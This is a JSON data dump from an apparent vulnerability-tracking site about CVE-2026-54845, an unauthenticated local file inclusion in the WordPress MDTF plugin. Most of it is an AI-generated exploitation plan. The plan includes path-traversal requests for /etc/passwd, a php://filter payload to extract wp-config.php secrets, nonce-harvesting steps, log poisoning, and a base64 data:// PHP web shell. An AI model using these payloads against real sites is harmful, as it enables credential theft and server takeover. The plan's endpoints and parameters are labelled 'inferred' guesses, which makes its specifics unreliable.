[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f4plo_qIViiS3klJwgUBjJ9rhZyZ9paD_xx7NVL5YgAo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":29},"CVE-2026-54845","mdtf-meta-data-and-taxonomies-filter-unauthenticated-local-file-inclusion","MDTF – Meta Data and Taxonomies Filter \u003C= 1.3.8 - Unauthenticated Local File Inclusion","The MDTF – Meta Data and Taxonomies Filter plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.3.8. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \"safe\" file types can be uploaded and included.","wp-meta-data-filter-and-taxonomy-filter",null,"\u003C=1.3.8","1.3.9","high",8.1,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Filename for Include\u002FRequire Statement in PHP Program ('PHP Remote File Inclusion')","2026-06-18 00:00:00","2026-06-23 15:50:50",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fc729f826-3073-4e77-a663-1a1d3ab229e7?source=api-prod",6,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-54845 (MDTF LFI)\n\n## 1. Vulnerability Summary\nThe **MDTF – Meta Data and Taxonomies Filter** plugin (up to version 1.3.8) is vulnerable to **Unauthenticated Local File Inclusion (LFI)**. The vulnerability exists because the plugin accepts a user-controlled file path through an AJAX action or a shortcode attribute and passes it directly to a PHP `include()` or `require()` statement without sufficient sanitization or validation against a whitelist. This allows an unauthenticated attacker to include arbitrary files from the server, potentially leading to sensitive data exposure (e.g., `wp-config.php`, `\u002Fetc\u002Fpasswd`) or Remote Code Execution (RCE) if the attacker can control the contents of an included file (e.g., via log poisoning or file uploads).\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `mdf_get_template` (inferred) or `mdf_draw_term_childs` (inferred).\n*   **Vulnerable Parameter:** `template_path` (inferred) or `mdf_template` (inferred).\n*   **Authentication:** None required (vulnerability exists in a `wp_ajax_nopriv_` handler).\n*   **Preconditions:** The plugin must be active. A valid WordPress nonce for the action may be required if the handler calls `check_ajax_referer()`.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** An unauthenticated user sends a POST or GET request to `admin-ajax.php` with the `action` parameter set to a public-facing MDTF action (e.g., `mdf_get_template`).\n2.  **Hook Registration:** The plugin registers the action via:\n    `add_action('wp_ajax_nopriv_mdf_get_template', 'mdf_get_template_handler');`\n3.  **Vulnerable Handler:** The handler function (e.g., `mdf_get_template_handler`) retrieves a path from `$_REQUEST['template_path']`.\n4.  **The Sink:** The retrieved path is passed to an include statement:\n    `include(MDF_PATH . $_REQUEST['template_path']);` \n    *Note: If the path starts with `..\u002F`, the attacker can break out of the intended directory.*\n5.  **Execution:** PHP includes and executes the file at the traversed path.\n\n## 4. Nonce Acquisition Strategy\nIf the AJAX handler enforces a nonce check, the nonce is typically exposed in the frontend to support the filter's functionality.\n\n1.  **Identify Trigger:** MDTF scripts and nonces are usually loaded on pages containing the search form shortcode.\n2.  **Create Test Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"MDTF Test\" --post_status=publish --post_content='[mdf_search_form]'\n    ```\n3.  **Extract Nonce via Browser:**\n    *   Navigate to the newly created page using `browser_navigate`.\n    *   Identify the global JavaScript variable registered via `wp_localize_script`. In MDTF, this is often `mdf_vars`.\n    *   Execute: `browser_eval(\"window.mdf_vars?.nonce\")` or `browser_eval(\"window.mdf_vars?.ajax_nonce\")`.\n4.  **Bypass Check:** Check if `wp_verify_nonce` is called with the correct action string. If the plugin uses `-1` or a generic action, the nonce might be retrievable from any page.\n\n## 5. Exploitation Strategy\nThe goal is to include `\u002Fetc\u002Fpasswd` to prove LFI and `wp-config.php` to prove sensitive data access.\n\n### Step 1: Probe for LFI\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Body (URL-encoded):**\n    ```\n    action=mdf_get_template&template_path=..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd&nonce=\u003CNONCE>\n    ```\n    *(Adjust traversal depth as needed)*\n\n### Step 2: Extract wp-config.php\nSince `wp-config.php` is executed as PHP, its contents won't be displayed unless the LFI is used in a \"read\" sink (like `file_get_contents`) or via a PHP filter wrapper.\n*   **Payload:**\n    ```\n    action=mdf_get_template&template_path=php:\u002F\u002Ffilter\u002Fconvert.base64-encode\u002Fresource=..\u002F..\u002F..\u002F..\u002Fwp-config.php&nonce=\u003CNONCE>\n    ```\n*   **Expected Response:** A Base64 encoded string of the `wp-config.php` source code.\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `wp-meta-data-filter-and-taxonomy-filter` version 1.3.8 is installed and active.\n2.  **Create Search Form:** Use `wp-cli` or the admin UI to create at least one MDTF search form so the shortcode rendering logic is functional.\n3.  **Place Shortcode:** Ensure the shortcode `[mdf_search_form]` is on a public page to facilitate nonce extraction.\n\n## 7. Expected Results\n*   **Successful Probing:** The response body contains the contents of `\u002Fetc\u002Fpasswd` (e.g., `root:x:0:0:root:\u002Froot:\u002Fbin\u002Fbash`).\n*   **Successful Data Extraction:** The response contains a Base64 string that, when decoded, reveals the `DB_PASSWORD` and `AUTH_KEY` from `wp-config.php`.\n\n## 8. Verification Steps\n1.  **Confirm File Content:** Compare the output from the HTTP request with the actual server file:\n    ```bash\n    cat \u002Fetc\u002Fpasswd\n    ```\n2.  **Verify via WP-CLI:** Check the plugin version to confirm it is \u003C= 1.3.8:\n    ```bash\n    wp plugin get wp-meta-data-filter-and-taxonomy-filter --field=version\n    ```\n\n## 9. Alternative Approaches\n*   **Null Byte Injection:** If the plugin appends a `.php` extension (e.g., `include($path . '.php')`), and the server runs an old PHP version (\u003C 5.3.4), try `%00` termination: `template_path=..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd%00`.\n*   **Path Truncation:** On older systems, very long paths (4096+ chars) might truncate the appended extension.\n*   **Log Poisoning:** If the server's access logs are readable (e.g., `\u002Fvar\u002Flog\u002Fapache2\u002Faccess.log`), inject PHP code into the User-Agent header of a request, then include the log file via the LFI to achieve RCE.\n*   **Wrapper Variants:** If `php:\u002F\u002Ffilter` is disabled, try `data:\u002F\u002Ftext\u002Fplain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+` to test for Remote File Inclusion (RFI) capabilities if `allow_url_include` is On.","gemini-3-flash-preview","2026-06-25 20:59:20","2026-06-25 20:59:52",{"type":30,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":31},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-meta-data-filter-and-taxonomy-filter\u002Ftags"]